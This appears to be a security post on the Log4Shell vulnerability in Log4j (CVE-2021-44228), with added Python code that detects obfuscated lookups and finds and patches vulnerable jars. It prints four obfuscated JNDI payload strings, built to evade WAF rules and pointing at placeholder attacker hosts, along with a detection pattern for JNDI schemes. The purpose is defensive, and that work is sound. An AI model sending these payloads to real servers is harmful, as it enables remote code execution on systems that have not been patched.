Critical vulnerability in Apache Log4j library
A zero-day remote code execution vulnerability has recently been reported in the widely used Log4j 2 logging library, tracked as CVE-2021-44228 (also called Log4Shell). Any attacker who can get a crafted string into a message that the application logs can make Log4j perform a JNDI lookup against an attacker-controlled server and execute code returned from it. Many large software companies and online services use Log4j, including Amazon, Cisco, Apple iCloud, Cloudflare, Elasticsearch, Red Hat, Steam, Tesla, Twitter and many more.
Attackers are using payloads like the following to bypass web application firewall rules that only match the literal string "jndi:". Log4j resolves the nested ${lower:...}, ${upper:...} and ${::-x} lookups before the JNDI lookup runs, so each of these evaluates to an ordinary ${jndi:...} string by the time it is dangerous:
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${jndi:ldap://127.0.0.1:1389/badClassName}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}
and many others...
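The following Python detector is an added example, not code from the original post: it undoes the obfuscation the same way Log4j does (resolving the innermost ${...} first, so ${lower:x}, ${upper:x} and the ${anything:-default} form collapse to plain text) and only then matches for a JNDI lookup, which is why it catches all four payloads above while a naive "jndi:" signature catches only the plain one. The sample log lines are constructed for the demonstration, with the post's payloads placed in a User-Agent header.

```python
"""Normalise Log4j 2 lookup obfuscation, then match for a JNDI lookup.

Added example (not from the original post): a WAF or log rule that only
looks for the literal "jndi:" misses the obfuscated payloads, because
Log4j evaluates nested ${...} lookups inside-out before the JNDI lookup
ever sees the string.  This replays the three tricks those payloads rely
on (${lower:x}, ${upper:x} and ${anything:-default}, of which ${::-j}
is the degenerate case) and matches the result instead.
"""
import re

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# JNDI URL schemes the post lists as usable by the exploit.
JNDI_SCHEMES = ("ldaps", "ldap", "rmi", "dns", "nis", "iiop", "corba", "nds", "http")
JNDI_PATTERN = re.compile(r"jndi:(%s)\b" % "|".join(JNDI_SCHEMES), re.IGNORECASE)

# What a naive signature does: look for the literal token only.
NAIVE_PATTERN = re.compile(r"jndi:", re.IGNORECASE)


def _resolve(match):
    body = match.group(1)
    # ${name:-default}: the attacker relies on the lookup failing so that
    # the default text is emitted, so "${::-j}" resolves to "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    # Any other lookup (jndi, env, sys, ...) is left in place unchanged.
    return match.group(0)


def normalize(text, max_passes=32):
    """Resolve obfuscating lookups inside-out until nothing changes."""
    for _ in range(max_passes):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect(text):
    """Return the JNDI scheme found after normalisation, or None."""
    m = JNDI_PATTERN.search(normalize(text))
    return m.group(1).lower() if m else None


def naive_detect(text):
    """The literal-token check a weak WAF rule performs."""
    return NAIVE_PATTERN.search(text) is not None


# Constructed sample log lines: the post's payloads inside a User-Agent
# header, plus one benign request.
SAMPLE_LOG = [
    'GET / "User-Agent: ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}"',
    'GET / "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}"',
    'GET / "User-Agent: ${jndi:ldap://127.0.0.1:1389/badClassName}"',
    'GET / "User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}"',
    'GET /index.html "User-Agent: Mozilla/5.0 (X11; Linux x86_64)"',
]


def scan(lines):
    """(naive_hit, scheme_after_normalisation) for each line."""
    return [(naive_detect(line), detect(line)) for line in lines]


if __name__ == "__main__":
    for line, (naive, scheme) in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(f"naive={naive!s:5} normalised={scheme!s:5}  {line}")
```

The mixed-case result ${jNdI:rmi://...} from the fourth payload is still matched because Log4j lower-cases the lookup name before dispatching it, so the detector does the same. Unknown lookups such as ${env:...} without a default are deliberately left in place rather than guessed at; treat a request that still contains ${ after normalisation as suspicious in its own right.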
Be aware that the JNDI lookup in these payloads is not limited to LDAP; it can use any of the following protocols (and their usual ports), so outbound filtering has to cover all of them:
LDAP(S), RMI, DNS, NIS, IIOP, CORBA, NDS, HTTP
How to protect your organization?
IPS rules, firewall rules, WAF rules and web filtering all help: block inbound requests carrying CVE-2021-44228 lookup strings, and stop servers from making outbound connections to unknown or known-bad hosts, because the exploit only succeeds if the victim can reach the attacker's LDAP/RMI server to fetch the payload. Treat these controls as stop-gaps, since the obfuscated payloads above show how easily signature rules are bypassed.
Patch your own systems right now! Upgrade log4j-core to a fixed release (2.15.0 or later for CVE-2021-44228; the later 2.17.x releases also cover the follow-on CVEs), and where you cannot upgrade yet, remove the JndiLookup class from the jar as Apache advises.
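To make "patch right now" actionable, here is an added Python example (not from the original post) that inventories log4j-core jars under a directory, reads each jar's version from its own Maven pom.properties, flags anything below 2.15.0 that still ships JndiLookup.class, and applies Apache's documented stop-gap of removing that class from the jar. The two sample jars built by demo() are constructed fixtures with placeholder bytes, not real Log4j artifacts.

```python
"""Find log4j-core jars, report their version and apply Apache's mitigation.

Added example (not from the original post).  It walks a directory tree
for log4j-core-*.jar, reads the version from the jar's Maven
pom.properties (falling back to the file name), flags anything below
2.15.0 that still contains JndiLookup.class, and can rewrite a jar
without org/apache/logging/log4j/core/lookup/JndiLookup.class, the
mitigation Apache documented for installations that cannot upgrade yet.
"""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIX_RELEASE = (2, 15, 0)  # first release fixing CVE-2021-44228
JAR_NAME = re.compile(r"^log4j-core-(\d[\w.\-]*)\.jar$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0); 'unknown' -> ()."""
    parts = []
    for piece in re.split(r"[.\-]", text.strip()):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def jar_version(path):
    """Version from pom.properties inside the jar, else from the file name."""
    with zipfile.ZipFile(path) as jar:
        if POM_PROPERTIES in jar.namelist():
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    m = JAR_NAME.match(os.path.basename(path))
    return m.group(1) if m else "unknown"


def assess(path):
    """(version, vulnerable, jndi_lookup_present).  An unparseable version
    compares as () < FIX_RELEASE, so it is conservatively treated as old."""
    version = jar_version(path)
    with zipfile.ZipFile(path) as jar:
        present = JNDI_LOOKUP_CLASS in jar.namelist()
    return version, parse_version(version) < FIX_RELEASE and present, present


def scan_tree(root):
    """(path, version, vulnerable, jndi_lookup_present) for every log4j-core jar."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if JAR_NAME.match(name):
                path = os.path.join(dirpath, name)
                findings.append((path,) + assess(path))
    return findings


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class; same effect as
    `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.
    Returns True if the class was removed.  Stop the JVM first, restart it after."""
    tmp_fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".", suffix=".jar")
    os.close(tmp_fd)
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            os.unlink(tmp)
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)  # atomic swap so a crash never leaves a half-written jar
    return True


def make_sample_jar(path, version):
    """Constructed fixture: a minimal jar with pom.properties and a dummy
    JndiLookup.class entry (placeholder bytes, not real bytecode)."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr(POM_PROPERTIES, "version=%s\n" % version)
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Build two sample jars in a temp dir, scan, mitigate the old one, rescan."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    old = os.path.join(root, "lib", "log4j-core-2.14.1.jar")
    new = os.path.join(root, "log4j-core-2.17.1.jar")
    os.makedirs(os.path.dirname(old))
    make_sample_jar(old, "2.14.1")
    make_sample_jar(new, "2.17.1")
    before = {os.path.basename(p): (v, vuln) for p, v, vuln, _ in scan_tree(root)}
    removed = strip_jndi_lookup(old)
    after = {os.path.basename(p): (v, vuln) for p, v, vuln, _ in scan_tree(root)}
    return before, removed, after


if __name__ == "__main__":
    before, removed, after = demo()
    print("before:", before)
    print("JndiLookup.class removed:", removed)
    print("after: ", after)
```

Removing the class only neutralises the JNDI lookup in that one jar; shaded or uber-jars that bundle log4j-core under another file name will not be found by the log4j-core-*.jar pattern, so treat this as a first pass and still upgrade as soon as you can.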
__________________________________________________________
#cybersecurity #CVE #CTI #DFIR #webapplicationsecurity #databases #Ismail_Ahmed
2y Filip Jurkiewicz
Cybersecurity Researcher
2y List of applications that use Log4j ... https://www.rumble.run/blog/finding-log4j/
Cybersecurity Researcher
2y Hackers start pushing malware in worldwide Log4Shell attacks https://www.bleepingcomputer.com/.../hackers-start.../
Cybersecurity Researcher
2y Thanks to all who are considering security investment in the 2022 budget to mitigate risk and prevent significant financial losses.